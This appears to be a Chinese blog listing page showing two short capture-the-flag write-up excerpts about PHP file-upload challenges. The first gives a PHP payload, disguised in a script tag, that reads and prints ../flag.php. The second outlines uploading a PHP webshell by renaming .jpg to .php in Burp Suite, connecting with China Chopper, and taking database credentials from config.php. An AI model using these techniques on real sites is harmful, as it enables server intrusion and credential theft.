摘要:
首先生成一个php文件以下源代码: <script language="PHP">$fh=fopen("../flag.".strtolower("PHP"),'r');echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符, 阅读全文
posted @ 2020-08-15 22:51
kalibb
阅读(185)
评论(0)
推荐(0)
摘要:
打开网页我们我们发现了上传地址,上传php一句话 2.burpsuite拦截把.jpg改成.php 3.菜刀连接上去在里面发现了数据库配置文件config.php,看到了数据库账号密码 4.编辑菜刀连接数据库上去拿到flag 阅读全文
posted @ 2020-08-15 22:38
kalibb
阅读(508)
评论(0)
推荐(0)
浙公网安备 33010602011771号